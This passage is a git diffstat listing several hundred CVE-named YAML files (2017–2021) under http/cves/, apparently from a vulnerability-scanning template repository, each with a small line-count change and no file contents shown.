+-- http/cves/2017/CVE-2017-9288.yaml | 3 +-- http/cves/2017/CVE-2017-9416.yaml | 3 +-- http/cves/2017/CVE-2017-9506.yaml | 3 +-- http/cves/2017/CVE-2017-9822.yaml | 3 +-- http/cves/2017/CVE-2017-9833.yaml | 3 +-- http/cves/2017/CVE-2017-9841.yaml | 3 +-- http/cves/2018/CVE-2018-0127.yaml | 3 +-- http/cves/2018/CVE-2018-0296.yaml | 3 +-- http/cves/2018/CVE-2018-1000129.yaml | 3 +-- http/cves/2018/CVE-2018-1000130.yaml | 3 +-- http/cves/2018/CVE-2018-1000226.yaml | 3 +-- http/cves/2018/CVE-2018-1000600.yaml | 3 +-- http/cves/2018/CVE-2018-1000671.yaml | 3 +-- http/cves/2018/CVE-2018-1000856.yaml | 3 +-- http/cves/2018/CVE-2018-1000861.yaml | 3 +-- http/cves/2018/CVE-2018-10093.yaml | 3 +-- http/cves/2018/CVE-2018-10141.yaml | 3 +-- http/cves/2018/CVE-2018-10201.yaml | 3 +-- http/cves/2018/CVE-2018-10230.yaml | 3 +-- http/cves/2018/CVE-2018-10562.yaml | 3 +-- http/cves/2018/CVE-2018-10822.yaml | 3 +-- http/cves/2018/CVE-2018-10956.yaml | 3 +-- http/cves/2018/CVE-2018-11227.yaml | 3 +-- http/cves/2018/CVE-2018-11231.yaml | 3 +-- http/cves/2018/CVE-2018-11473.yaml | 3 +-- http/cves/2018/CVE-2018-11709.yaml | 3 +-- http/cves/2018/CVE-2018-11784.yaml | 3 +-- http/cves/2018/CVE-2018-12031.yaml | 3 +-- http/cves/2018/CVE-2018-12054.yaml | 3 +-- http/cves/2018/CVE-2018-1207.yaml | 3 +-- http/cves/2018/CVE-2018-12095.yaml | 3 +-- http/cves/2018/CVE-2018-12296.yaml | 3 +-- http/cves/2018/CVE-2018-12300.yaml | 3 +-- http/cves/2018/CVE-2018-12675.yaml | 3 +-- http/cves/2018/CVE-2018-1271.yaml | 3 +-- http/cves/2018/CVE-2018-1273.yaml | 3 +-- http/cves/2018/CVE-2018-12909.yaml | 3 +-- http/cves/2018/CVE-2018-12998.yaml | 3 +-- http/cves/2018/CVE-2018-13380.yaml | 3 +-- http/cves/2018/CVE-2018-13980.yaml | 3 +-- http/cves/2018/CVE-2018-14013.yaml | 3 +-- http/cves/2018/CVE-2018-14064.yaml | 3 +-- http/cves/2018/CVE-2018-14474.yaml | 3 +-- http/cves/2018/CVE-2018-14574.yaml | 3 +-- http/cves/2018/CVE-2018-14912.yaml | 3 +-- http/cves/2018/CVE-2018-14916.yaml | 3 +-- http/cves/2018/CVE-2018-14918.yaml | 3 +-- http/cves/2018/CVE-2018-14931.yaml | 3 +-- http/cves/2018/CVE-2018-15138.yaml | 3 +-- http/cves/2018/CVE-2018-15517.yaml | 3 +-- http/cves/2018/CVE-2018-15745.yaml | 3 +-- http/cves/2018/CVE-2018-15917.yaml | 3 +-- http/cves/2018/CVE-2018-16059.yaml | 3 +-- http/cves/2018/CVE-2018-16133.yaml | 3 +-- http/cves/2018/CVE-2018-16139.yaml | 3 +-- http/cves/2018/CVE-2018-16159.yaml | 3 +-- http/cves/2018/CVE-2018-16167.yaml | 3 +-- http/cves/2018/CVE-2018-16283.yaml | 3 +-- http/cves/2018/CVE-2018-16299.yaml | 3 +-- http/cves/2018/CVE-2018-16668.yaml | 3 +-- http/cves/2018/CVE-2018-16670.yaml | 3 +-- http/cves/2018/CVE-2018-16671.yaml | 3 +-- http/cves/2018/CVE-2018-16716.yaml | 3 +-- http/cves/2018/CVE-2018-16761.yaml | 3 +-- http/cves/2018/CVE-2018-16763.yaml | 3 +-- http/cves/2018/CVE-2018-16836.yaml | 3 +-- http/cves/2018/CVE-2018-16979.yaml | 3 +-- http/cves/2018/CVE-2018-17153.yaml | 3 +-- http/cves/2018/CVE-2018-17246.yaml | 3 +-- http/cves/2018/CVE-2018-17254.yaml | 3 +-- http/cves/2018/CVE-2018-17422.yaml | 3 +-- http/cves/2018/CVE-2018-17431.yaml | 3 +-- http/cves/2018/CVE-2018-18069.yaml | 3 +-- http/cves/2018/CVE-2018-18264.yaml | 3 +-- http/cves/2018/CVE-2018-18323.yaml | 3 +-- http/cves/2018/CVE-2018-18570.yaml | 3 +-- http/cves/2018/CVE-2018-18608.yaml | 3 +-- http/cves/2018/CVE-2018-18775.yaml | 3 +-- http/cves/2018/CVE-2018-18777.yaml | 3 +-- http/cves/2018/CVE-2018-18809.yaml | 3 +-- http/cves/2018/CVE-2018-18925.yaml | 3 +-- http/cves/2018/CVE-2018-19136.yaml | 3 +-- http/cves/2018/CVE-2018-19137.yaml | 3 +-- http/cves/2018/CVE-2018-19287.yaml | 3 +-- http/cves/2018/CVE-2018-19326.yaml | 3 +-- http/cves/2018/CVE-2018-19365.yaml | 3 +-- http/cves/2018/CVE-2018-19386.yaml | 3 +-- http/cves/2018/CVE-2018-19439.yaml | 3 +-- http/cves/2018/CVE-2018-19458.yaml | 3 +-- http/cves/2018/CVE-2018-19749.yaml | 3 +-- http/cves/2018/CVE-2018-19751.yaml | 3 +-- http/cves/2018/CVE-2018-19752.yaml | 3 +-- http/cves/2018/CVE-2018-19753.yaml | 3 +-- http/cves/2018/CVE-2018-19877.yaml | 3 +-- http/cves/2018/CVE-2018-19892.yaml | 3 +-- http/cves/2018/CVE-2018-19914.yaml | 3 +-- http/cves/2018/CVE-2018-19915.yaml | 3 +-- http/cves/2018/CVE-2018-20009.yaml | 3 +-- http/cves/2018/CVE-2018-20010.yaml | 3 +-- http/cves/2018/CVE-2018-20011.yaml | 3 +-- http/cves/2018/CVE-2018-20462.yaml | 3 +-- http/cves/2018/CVE-2018-20463.yaml | 3 +-- http/cves/2018/CVE-2018-20470.yaml | 3 +-- http/cves/2018/CVE-2018-20526.yaml | 3 +-- http/cves/2018/CVE-2018-20608.yaml | 3 +-- http/cves/2018/CVE-2018-20824.yaml | 3 +-- http/cves/2018/CVE-2018-20985.yaml | 3 +-- http/cves/2018/CVE-2018-2392.yaml | 2 +- http/cves/2018/CVE-2018-2791.yaml | 3 +-- http/cves/2018/CVE-2018-3167.yaml | 3 +-- http/cves/2018/CVE-2018-3238.yaml | 3 +-- http/cves/2018/CVE-2018-3714.yaml | 3 +-- http/cves/2018/CVE-2018-3760.yaml | 3 +-- http/cves/2018/CVE-2018-3810.yaml | 3 +-- http/cves/2018/CVE-2018-5230.yaml | 3 +-- http/cves/2018/CVE-2018-5233.yaml | 3 +-- http/cves/2018/CVE-2018-5316.yaml | 3 +-- http/cves/2018/CVE-2018-5715.yaml | 3 +-- http/cves/2018/CVE-2018-6008.yaml | 3 +-- http/cves/2018/CVE-2018-6184.yaml | 3 +-- http/cves/2018/CVE-2018-6200.yaml | 3 +-- http/cves/2018/CVE-2018-6530.yaml | 3 +-- http/cves/2018/CVE-2018-6910.yaml | 3 +-- http/cves/2018/CVE-2018-7251.yaml | 3 +-- http/cves/2018/CVE-2018-7282.yaml | 3 +-- http/cves/2018/CVE-2018-7422.yaml | 3 +-- http/cves/2018/CVE-2018-7467.yaml | 3 +-- http/cves/2018/CVE-2018-7602.yaml | 3 +-- http/cves/2018/CVE-2018-7653.yaml | 3 +-- http/cves/2018/CVE-2018-7662.yaml | 3 +-- http/cves/2018/CVE-2018-7700.yaml | 3 +-- http/cves/2018/CVE-2018-7719.yaml | 3 +-- http/cves/2018/CVE-2018-8033.yaml | 3 +-- http/cves/2018/CVE-2018-8715.yaml | 3 +-- http/cves/2018/CVE-2018-8719.yaml | 3 +-- http/cves/2018/CVE-2018-8727.yaml | 3 +-- http/cves/2018/CVE-2018-8770.yaml | 3 +-- http/cves/2018/CVE-2018-9118.yaml | 3 +-- http/cves/2018/CVE-2018-9161.yaml | 3 +-- http/cves/2018/CVE-2018-9205.yaml | 3 +-- http/cves/2018/CVE-2018-9845.yaml | 3 +-- http/cves/2018/CVE-2018-9995.yaml | 3 +-- http/cves/2019/CVE-2019-0193.yaml | 3 +-- http/cves/2019/CVE-2019-0221.yaml | 3 +-- http/cves/2019/CVE-2019-10068.yaml | 3 +-- http/cves/2019/CVE-2019-10092.yaml | 3 +-- http/cves/2019/CVE-2019-10098.yaml | 3 +-- http/cves/2019/CVE-2019-1010287.yaml | 3 +-- http/cves/2019/CVE-2019-1010290.yaml | 3 +-- http/cves/2019/CVE-2019-10232.yaml | 3 +-- http/cves/2019/CVE-2019-10405.yaml | 3 +-- http/cves/2019/CVE-2019-10717.yaml | 3 +-- http/cves/2019/CVE-2019-10758.yaml | 3 +-- http/cves/2019/CVE-2019-11013.yaml | 3 +-- http/cves/2019/CVE-2019-11248.yaml | 3 +-- http/cves/2019/CVE-2019-11370.yaml | 3 +-- http/cves/2019/CVE-2019-11580.yaml | 3 +-- http/cves/2019/CVE-2019-11581.yaml | 3 +-- http/cves/2019/CVE-2019-11869.yaml | 3 +-- http/cves/2019/CVE-2019-12314.yaml | 3 +-- http/cves/2019/CVE-2019-12461.yaml | 3 +-- http/cves/2019/CVE-2019-12581.yaml | 3 +-- http/cves/2019/CVE-2019-12583.yaml | 3 +-- http/cves/2019/CVE-2019-12616.yaml | 3 +-- http/cves/2019/CVE-2019-12962.yaml | 3 +-- http/cves/2019/CVE-2019-12990.yaml | 3 +-- http/cves/2019/CVE-2019-13101.yaml | 3 +-- http/cves/2019/CVE-2019-13392.yaml | 3 +-- http/cves/2019/CVE-2019-13396.yaml | 3 +-- http/cves/2019/CVE-2019-13462.yaml | 3 +-- http/cves/2019/CVE-2019-14205.yaml | 3 +-- http/cves/2019/CVE-2019-14223.yaml | 3 +-- http/cves/2019/CVE-2019-14251.yaml | 3 +-- http/cves/2019/CVE-2019-14312.yaml | 3 +-- http/cves/2019/CVE-2019-14322.yaml | 3 +-- http/cves/2019/CVE-2019-14470.yaml | 3 +-- http/cves/2019/CVE-2019-14530.yaml | 3 +-- http/cves/2019/CVE-2019-14696.yaml | 3 +-- http/cves/2019/CVE-2019-14750.yaml | 3 +-- http/cves/2019/CVE-2019-14789.yaml | 3 +-- http/cves/2019/CVE-2019-14974.yaml | 3 +-- http/cves/2019/CVE-2019-15043.yaml | 3 +-- http/cves/2019/CVE-2019-15107.yaml | 3 +-- http/cves/2019/CVE-2019-15501.yaml | 3 +-- http/cves/2019/CVE-2019-15642.yaml | 3 +-- http/cves/2019/CVE-2019-15713.yaml | 3 +-- http/cves/2019/CVE-2019-15811.yaml | 3 +-- http/cves/2019/CVE-2019-15829.yaml | 3 +-- http/cves/2019/CVE-2019-15858.yaml | 3 +-- http/cves/2019/CVE-2019-15859.yaml | 3 +-- http/cves/2019/CVE-2019-15889.yaml | 3 +-- http/cves/2019/CVE-2019-16097.yaml | 3 +-- http/cves/2019/CVE-2019-16123.yaml | 3 +-- http/cves/2019/CVE-2019-16278.yaml | 3 +-- http/cves/2019/CVE-2019-16313.yaml | 3 +-- http/cves/2019/CVE-2019-16332.yaml | 3 +-- http/cves/2019/CVE-2019-16525.yaml | 3 +-- http/cves/2019/CVE-2019-16931.yaml | 3 +-- http/cves/2019/CVE-2019-16932.yaml | 3 +-- http/cves/2019/CVE-2019-16996.yaml | 3 +-- http/cves/2019/CVE-2019-16997.yaml | 3 +-- http/cves/2019/CVE-2019-17270.yaml | 3 +-- http/cves/2019/CVE-2019-17418.yaml | 3 +-- http/cves/2019/CVE-2019-17444.yaml | 3 +-- http/cves/2019/CVE-2019-17503.yaml | 3 +-- http/cves/2019/CVE-2019-17506.yaml | 3 +-- http/cves/2019/CVE-2019-17538.yaml | 3 +-- http/cves/2019/CVE-2019-17574.yaml | 3 +-- http/cves/2019/CVE-2019-17662.yaml | 3 +-- http/cves/2019/CVE-2019-1821.yaml | 3 +-- http/cves/2019/CVE-2019-18371.yaml | 3 +-- http/cves/2019/CVE-2019-18393.yaml | 3 +-- http/cves/2019/CVE-2019-18394.yaml | 3 +-- http/cves/2019/CVE-2019-18665.yaml | 3 +-- http/cves/2019/CVE-2019-18818.yaml | 3 +-- http/cves/2019/CVE-2019-18922.yaml | 3 +-- http/cves/2019/CVE-2019-18957.yaml | 3 +-- http/cves/2019/CVE-2019-1898.yaml | 3 +-- http/cves/2019/CVE-2019-19134.yaml | 3 +-- http/cves/2019/CVE-2019-19368.yaml | 3 +-- http/cves/2019/CVE-2019-1943.yaml | 3 +-- http/cves/2019/CVE-2019-19908.yaml | 3 +-- http/cves/2019/CVE-2019-19985.yaml | 3 +-- http/cves/2019/CVE-2019-20085.yaml | 3 +-- http/cves/2019/CVE-2019-20141.yaml | 3 +-- http/cves/2019/CVE-2019-20183.yaml | 3 +-- http/cves/2019/CVE-2019-20210.yaml | 3 +-- http/cves/2019/CVE-2019-20224.yaml | 3 +-- http/cves/2019/CVE-2019-20933.yaml | 3 +-- http/cves/2019/CVE-2019-2578.yaml | 3 +-- http/cves/2019/CVE-2019-2579.yaml | 3 +-- http/cves/2019/CVE-2019-2588.yaml | 3 +-- http/cves/2019/CVE-2019-2729.yaml | 3 +-- http/cves/2019/CVE-2019-3401.yaml | 2 +- http/cves/2019/CVE-2019-3402.yaml | 3 +-- http/cves/2019/CVE-2019-3403.yaml | 3 +-- http/cves/2019/CVE-2019-3799.yaml | 3 +-- http/cves/2019/CVE-2019-3911.yaml | 3 +-- http/cves/2019/CVE-2019-3912.yaml | 3 +-- http/cves/2019/CVE-2019-3929.yaml | 3 +-- http/cves/2019/CVE-2019-5434.yaml | 3 +-- http/cves/2019/CVE-2019-6112.yaml | 3 +-- http/cves/2019/CVE-2019-6340.yaml | 3 +-- http/cves/2019/CVE-2019-6715.yaml | 3 +-- http/cves/2019/CVE-2019-6799.yaml | 3 +-- http/cves/2019/CVE-2019-6802.yaml | 3 +-- http/cves/2019/CVE-2019-7192.yaml | 3 +-- http/cves/2019/CVE-2019-7219.yaml | 3 +-- http/cves/2019/CVE-2019-7238.yaml | 3 +-- http/cves/2019/CVE-2019-7254.yaml | 3 +-- http/cves/2019/CVE-2019-7255.yaml | 3 +-- http/cves/2019/CVE-2019-7275.yaml | 3 +-- http/cves/2019/CVE-2019-7315.yaml | 3 +-- http/cves/2019/CVE-2019-7481.yaml | 3 +-- http/cves/2019/CVE-2019-7543.yaml | 3 +-- http/cves/2019/CVE-2019-7609.yaml | 3 +-- http/cves/2019/CVE-2019-8086.yaml | 3 +-- http/cves/2019/CVE-2019-8390.yaml | 3 +-- http/cves/2019/CVE-2019-8442.yaml | 3 +-- http/cves/2019/CVE-2019-8446.yaml | 3 +-- http/cves/2019/CVE-2019-8449.yaml | 3 +-- http/cves/2019/CVE-2019-8903.yaml | 3 +-- http/cves/2019/CVE-2019-8937.yaml | 3 +-- http/cves/2019/CVE-2019-8982.yaml | 3 +-- http/cves/2019/CVE-2019-9041.yaml | 3 +-- http/cves/2019/CVE-2019-9618.yaml | 3 +-- http/cves/2019/CVE-2019-9726.yaml | 3 +-- http/cves/2019/CVE-2019-9733.yaml | 3 +-- http/cves/2019/CVE-2019-9915.yaml | 3 +-- http/cves/2019/CVE-2019-9922.yaml | 3 +-- http/cves/2019/CVE-2019-9955.yaml | 3 +-- http/cves/2020/CVE-2020-10199.yaml | 3 +-- http/cves/2020/CVE-2020-10220.yaml | 3 +-- http/cves/2020/CVE-2020-10546.yaml | 3 +-- http/cves/2020/CVE-2020-10547.yaml | 3 +-- http/cves/2020/CVE-2020-10548.yaml | 3 +-- http/cves/2020/CVE-2020-10549.yaml | 3 +-- http/cves/2020/CVE-2020-10770.yaml | 3 +-- http/cves/2020/CVE-2020-10973.yaml | 3 +-- http/cves/2020/CVE-2020-11034.yaml | 3 +-- http/cves/2020/CVE-2020-11110.yaml | 3 +-- http/cves/2020/CVE-2020-11450.yaml | 3 +-- http/cves/2020/CVE-2020-11455.yaml | 3 +-- http/cves/2020/CVE-2020-11529.yaml | 3 +-- http/cves/2020/CVE-2020-11530.yaml | 3 +-- http/cves/2020/CVE-2020-11547.yaml | 3 +-- http/cves/2020/CVE-2020-11710.yaml | 3 +-- http/cves/2020/CVE-2020-11798.yaml | 3 +-- http/cves/2020/CVE-2020-11853.yaml | 3 +-- http/cves/2020/CVE-2020-11854.yaml | 3 +-- http/cves/2020/CVE-2020-11930.yaml | 3 +-- http/cves/2020/CVE-2020-11991.yaml | 3 +-- http/cves/2020/CVE-2020-12054.yaml | 3 +-- http/cves/2020/CVE-2020-12127.yaml | 3 +-- http/cves/2020/CVE-2020-12256.yaml | 3 +-- http/cves/2020/CVE-2020-12447.yaml | 3 +-- http/cves/2020/CVE-2020-12478.yaml | 3 +-- http/cves/2020/CVE-2020-12720.yaml | 3 +-- http/cves/2020/CVE-2020-13117.yaml | 3 +-- http/cves/2020/CVE-2020-13121.yaml | 3 +-- http/cves/2020/CVE-2020-13158.yaml | 3 +-- http/cves/2020/CVE-2020-13258.yaml | 3 +-- http/cves/2020/CVE-2020-13379.yaml | 3 +-- http/cves/2020/CVE-2020-13405.yaml | 3 +-- http/cves/2020/CVE-2020-13483.yaml | 3 +-- http/cves/2020/CVE-2020-13638.yaml | 3 +-- http/cves/2020/CVE-2020-13700.yaml | 3 +-- http/cves/2020/CVE-2020-13820.yaml | 3 +-- http/cves/2020/CVE-2020-13851.yaml | 3 +-- http/cves/2020/CVE-2020-13937.yaml | 3 +-- http/cves/2020/CVE-2020-13945.yaml | 3 +-- http/cves/2020/CVE-2020-14092.yaml | 3 +-- http/cves/2020/CVE-2020-14144.yaml | 3 +-- http/cves/2020/CVE-2020-14179.yaml | 3 +-- http/cves/2020/CVE-2020-14181.yaml | 3 +-- http/cves/2020/CVE-2020-14408.yaml | 3 +-- http/cves/2020/CVE-2020-14413.yaml | 3 +-- http/cves/2020/CVE-2020-14864.yaml | 3 +-- http/cves/2020/CVE-2020-15050.yaml | 3 +-- http/cves/2020/CVE-2020-15129.yaml | 3 +-- http/cves/2020/CVE-2020-15148.yaml | 3 +-- http/cves/2020/CVE-2020-15500.yaml | 3 +-- http/cves/2020/CVE-2020-15505.yaml | 3 +-- http/cves/2020/CVE-2020-15867.yaml | 3 +-- http/cves/2020/CVE-2020-15895.yaml | 3 +-- http/cves/2020/CVE-2020-16139.yaml | 3 +-- http/cves/2020/CVE-2020-16952.yaml | 3 +-- http/cves/2020/CVE-2020-17362.yaml | 3 +-- http/cves/2020/CVE-2020-17453.yaml | 3 +-- http/cves/2020/CVE-2020-17456.yaml | 3 +-- http/cves/2020/CVE-2020-17463.yaml | 3 +-- http/cves/2020/CVE-2020-17505.yaml | 3 +-- http/cves/2020/CVE-2020-17506.yaml | 3 +-- http/cves/2020/CVE-2020-17518.yaml | 3 +-- http/cves/2020/CVE-2020-17526.yaml | 3 +-- http/cves/2020/CVE-2020-17530.yaml | 3 +-- http/cves/2020/CVE-2020-18268.yaml | 3 +-- http/cves/2020/CVE-2020-19282.yaml | 3 +-- http/cves/2020/CVE-2020-19283.yaml | 3 +-- http/cves/2020/CVE-2020-19295.yaml | 3 +-- http/cves/2020/CVE-2020-19360.yaml | 3 +-- http/cves/2020/CVE-2020-19515.yaml | 3 +-- http/cves/2020/CVE-2020-1956.yaml | 3 +-- http/cves/2020/CVE-2020-19625.yaml | 3 +-- http/cves/2020/CVE-2020-20285.yaml | 3 +-- http/cves/2020/CVE-2020-20300.yaml | 3 +-- http/cves/2020/CVE-2020-2036.yaml | 3 +-- http/cves/2020/CVE-2020-20982.yaml | 3 +-- http/cves/2020/CVE-2020-20988.yaml | 3 +-- http/cves/2020/CVE-2020-21012.yaml | 3 +-- http/cves/2020/CVE-2020-2103.yaml | 3 +-- http/cves/2020/CVE-2020-21224.yaml | 3 +-- http/cves/2020/CVE-2020-2140.yaml | 3 +-- http/cves/2020/CVE-2020-22208.yaml | 3 +-- http/cves/2020/CVE-2020-22209.yaml | 3 +-- http/cves/2020/CVE-2020-22210.yaml | 3 +-- http/cves/2020/CVE-2020-22211.yaml | 3 +-- http/cves/2020/CVE-2020-22840.yaml | 3 +-- http/cves/2020/CVE-2020-23015.yaml | 3 +-- http/cves/2020/CVE-2020-23517.yaml | 3 +-- http/cves/2020/CVE-2020-23575.yaml | 3 +-- http/cves/2020/CVE-2020-23697.yaml | 3 +-- http/cves/2020/CVE-2020-23972.yaml | 3 +-- http/cves/2020/CVE-2020-24148.yaml | 3 +-- http/cves/2020/CVE-2020-24223.yaml | 3 +-- http/cves/2020/CVE-2020-24312.yaml | 3 +-- http/cves/2020/CVE-2020-24391.yaml | 3 +-- http/cves/2020/CVE-2020-24550.yaml | 3 +-- http/cves/2020/CVE-2020-24571.yaml | 3 +-- http/cves/2020/CVE-2020-24579.yaml | 3 +-- http/cves/2020/CVE-2020-24589.yaml | 3 +-- http/cves/2020/CVE-2020-24902.yaml | 3 +-- http/cves/2020/CVE-2020-24903.yaml | 3 +-- http/cves/2020/CVE-2020-24912.yaml | 3 +-- http/cves/2020/CVE-2020-25078.yaml | 3 +-- http/cves/2020/CVE-2020-25213.yaml | 3 +-- http/cves/2020/CVE-2020-25495.yaml | 3 +-- http/cves/2020/CVE-2020-25540.yaml | 3 +-- http/cves/2020/CVE-2020-25780.yaml | 3 +-- http/cves/2020/CVE-2020-25864.yaml | 3 +-- http/cves/2020/CVE-2020-26153.yaml | 3 +-- http/cves/2020/CVE-2020-26214.yaml | 3 +-- http/cves/2020/CVE-2020-26248.yaml | 3 +-- http/cves/2020/CVE-2020-26413.yaml | 3 +-- http/cves/2020/CVE-2020-26876.yaml | 3 +-- http/cves/2020/CVE-2020-26919.yaml | 3 +-- http/cves/2020/CVE-2020-26948.yaml | 3 +-- http/cves/2020/CVE-2020-27191.yaml | 3 +-- http/cves/2020/CVE-2020-2733.yaml | 3 +-- http/cves/2020/CVE-2020-27361.yaml | 3 +-- http/cves/2020/CVE-2020-27467.yaml | 3 +-- http/cves/2020/CVE-2020-27481.yaml | 3 +-- http/cves/2020/CVE-2020-27735.yaml | 3 +-- http/cves/2020/CVE-2020-27866.yaml | 3 +-- http/cves/2020/CVE-2020-27982.yaml | 3 +-- http/cves/2020/CVE-2020-27986.yaml | 3 +-- http/cves/2020/CVE-2020-28185.yaml | 3 +-- http/cves/2020/CVE-2020-28208.yaml | 3 +-- http/cves/2020/CVE-2020-28351.yaml | 3 +-- http/cves/2020/CVE-2020-28976.yaml | 3 +-- http/cves/2020/CVE-2020-29164.yaml | 3 +-- http/cves/2020/CVE-2020-29227.yaml | 3 +-- http/cves/2020/CVE-2020-29284.yaml | 3 +-- http/cves/2020/CVE-2020-29395.yaml | 3 +-- http/cves/2020/CVE-2020-29453.yaml | 3 +-- http/cves/2020/CVE-2020-29597.yaml | 3 +-- http/cves/2020/CVE-2020-3452.yaml | 3 +-- http/cves/2020/CVE-2020-35234.yaml | 3 +-- http/cves/2020/CVE-2020-35338.yaml | 3 +-- http/cves/2020/CVE-2020-35476.yaml | 3 +-- http/cves/2020/CVE-2020-35489.yaml | 3 +-- http/cves/2020/CVE-2020-35580.yaml | 3 +-- http/cves/2020/CVE-2020-35598.yaml | 3 +-- http/cves/2020/CVE-2020-35713.yaml | 3 +-- http/cves/2020/CVE-2020-35729.yaml | 3 +-- http/cves/2020/CVE-2020-35736.yaml | 3 +-- http/cves/2020/CVE-2020-35749.yaml | 3 +-- http/cves/2020/CVE-2020-35774.yaml | 3 +-- http/cves/2020/CVE-2020-3580.yaml | 3 +-- http/cves/2020/CVE-2020-35846.yaml | 3 +-- http/cves/2020/CVE-2020-35847.yaml | 3 +-- http/cves/2020/CVE-2020-35848.yaml | 3 +-- http/cves/2020/CVE-2020-35951.yaml | 3 +-- http/cves/2020/CVE-2020-35984.yaml | 3 +-- http/cves/2020/CVE-2020-35985.yaml | 3 +-- http/cves/2020/CVE-2020-35986.yaml | 3 +-- http/cves/2020/CVE-2020-35987.yaml | 3 +-- http/cves/2020/CVE-2020-36112.yaml | 3 +-- http/cves/2020/CVE-2020-36289.yaml | 3 +-- http/cves/2020/CVE-2020-36365.yaml | 3 +-- http/cves/2020/CVE-2020-36510.yaml | 3 +-- http/cves/2020/CVE-2020-4463.yaml | 3 +-- http/cves/2020/CVE-2020-5191.yaml | 3 +-- http/cves/2020/CVE-2020-5192.yaml | 3 +-- http/cves/2020/CVE-2020-5284.yaml | 3 +-- http/cves/2020/CVE-2020-5307.yaml | 3 +-- http/cves/2020/CVE-2020-5405.yaml | 3 +-- http/cves/2020/CVE-2020-5410.yaml | 3 +-- http/cves/2020/CVE-2020-5412.yaml | 2 +- http/cves/2020/CVE-2020-5775.yaml | 3 +-- http/cves/2020/CVE-2020-5776.yaml | 3 +-- http/cves/2020/CVE-2020-5777.yaml | 3 +-- http/cves/2020/CVE-2020-6171.yaml | 3 +-- http/cves/2020/CVE-2020-6308.yaml | 3 +-- http/cves/2020/CVE-2020-6637.yaml | 3 +-- http/cves/2020/CVE-2020-6950.yaml | 3 +-- http/cves/2020/CVE-2020-7107.yaml | 3 +-- http/cves/2020/CVE-2020-7136.yaml | 3 +-- http/cves/2020/CVE-2020-7318.yaml | 3 +-- http/cves/2020/CVE-2020-7796.yaml | 3 +-- http/cves/2020/CVE-2020-7943.yaml | 3 +-- http/cves/2020/CVE-2020-7961.yaml | 3 +-- http/cves/2020/CVE-2020-8115.yaml | 3 +-- http/cves/2020/CVE-2020-8191.yaml | 3 +-- http/cves/2020/CVE-2020-8209.yaml | 3 +-- http/cves/2020/CVE-2020-8497.yaml | 3 +-- http/cves/2020/CVE-2020-8512.yaml | 3 +-- http/cves/2020/CVE-2020-8515.yaml | 3 +-- http/cves/2020/CVE-2020-8615.yaml | 3 +-- http/cves/2020/CVE-2020-8641.yaml | 3 +-- http/cves/2020/CVE-2020-8654.yaml | 3 +-- http/cves/2020/CVE-2020-8771.yaml | 3 +-- http/cves/2020/CVE-2020-8772.yaml | 3 +-- http/cves/2020/CVE-2020-8813.yaml | 3 +-- http/cves/2020/CVE-2020-8982.yaml | 3 +-- http/cves/2020/CVE-2020-9036.yaml | 3 +-- http/cves/2020/CVE-2020-9043.yaml | 3 +-- http/cves/2020/CVE-2020-9047.yaml | 3 +-- http/cves/2020/CVE-2020-9054.yaml | 3 +-- http/cves/2020/CVE-2020-9344.yaml | 3 +-- http/cves/2020/CVE-2020-9402.yaml | 3 +-- http/cves/2020/CVE-2020-9425.yaml | 3 +-- http/cves/2020/CVE-2020-9483.yaml | 3 +-- http/cves/2020/CVE-2020-9757.yaml | 3 +-- http/cves/2021/CVE-2021-1497.yaml | 3 +-- http/cves/2021/CVE-2021-1498.yaml | 3 +-- http/cves/2021/CVE-2021-1499.yaml | 3 +-- http/cves/2021/CVE-2021-20031.yaml | 3 +-- http/cves/2021/CVE-2021-20038.yaml | 3 +-- http/cves/2021/CVE-2021-20091.yaml | 3 +-- http/cves/2021/CVE-2021-20092.yaml | 3 +-- http/cves/2021/CVE-2021-20114.yaml | 3 +-- http/cves/2021/CVE-2021-20123.yaml | 3 +-- http/cves/2021/CVE-2021-20124.yaml | 3 +-- http/cves/2021/CVE-2021-20150.yaml | 3 +-- http/cves/2021/CVE-2021-20158.yaml | 3 +-- http/cves/2021/CVE-2021-20167.yaml | 3 +-- http/cves/2021/CVE-2021-20323.yaml | 3 +-- http/cves/2021/CVE-2021-20792.yaml | 3 +-- http/cves/2021/CVE-2021-21087.yaml | 3 +-- http/cves/2021/CVE-2021-21234.yaml | 3 +-- http/cves/2021/CVE-2021-21311.yaml | 3 +-- http/cves/2021/CVE-2021-21315.yaml | 3 +-- http/cves/2021/CVE-2021-21345.yaml | 3 +-- http/cves/2021/CVE-2021-21389.yaml | 3 +-- http/cves/2021/CVE-2021-21402.yaml | 3 +-- http/cves/2021/CVE-2021-21479.yaml | 3 +-- http/cves/2021/CVE-2021-21745.yaml | 3 +-- http/cves/2021/CVE-2021-21799.yaml | 3 +-- http/cves/2021/CVE-2021-21800.yaml | 3 +-- http/cves/2021/CVE-2021-21801.yaml | 3 +-- http/cves/2021/CVE-2021-21802.yaml | 3 +-- http/cves/2021/CVE-2021-21803.yaml | 3 +-- http/cves/2021/CVE-2021-21816.yaml | 3 +-- http/cves/2021/CVE-2021-21978.yaml | 3 +-- http/cves/2021/CVE-2021-21985.yaml | 3 +-- http/cves/2021/CVE-2021-22005.yaml | 3 +-- http/cves/2021/CVE-2021-22053.yaml | 3 +-- http/cves/2021/CVE-2021-22054.yaml | 3 +-- http/cves/2021/CVE-2021-22122.yaml | 3 +-- http/cves/2021/CVE-2021-22707.yaml | 3 +-- http/cves/2021/CVE-2021-22873.yaml | 3 +-- http/cves/2021/CVE-2021-22911.yaml | 3 +-- http/cves/2021/CVE-2021-23241.yaml | 3 +-- http/cves/2021/CVE-2021-24145.yaml | 3 +-- http/cves/2021/CVE-2021-24146.yaml | 3 +-- http/cves/2021/CVE-2021-24150.yaml | 3 +-- http/cves/2021/CVE-2021-24155.yaml | 3 +-- http/cves/2021/CVE-2021-24165.yaml | 3 +-- http/cves/2021/CVE-2021-24169.yaml | 3 +-- http/cves/2021/CVE-2021-24176.yaml | 3 +-- http/cves/2021/CVE-2021-24210.yaml | 3 +-- http/cves/2021/CVE-2021-24214.yaml | 3 +-- http/cves/2021/CVE-2021-24215.yaml | 3 +-- http/cves/2021/CVE-2021-24226.yaml | 3 +-- http/cves/2021/CVE-2021-24227.yaml | 3 +-- http/cves/2021/CVE-2021-24235.yaml | 3 +-- http/cves/2021/CVE-2021-24236.yaml | 3 +-- http/cves/2021/CVE-2021-24237.yaml | 3 +-- http/cves/2021/CVE-2021-24239.yaml | 3 +-- http/cves/2021/CVE-2021-24245.yaml | 3 +-- http/cves/2021/CVE-2021-24274.yaml | 3 +-- http/cves/2021/CVE-2021-24275.yaml | 3 +-- http/cves/2021/CVE-2021-24276.yaml | 3 +-- http/cves/2021/CVE-2021-24278.yaml | 3 +-- 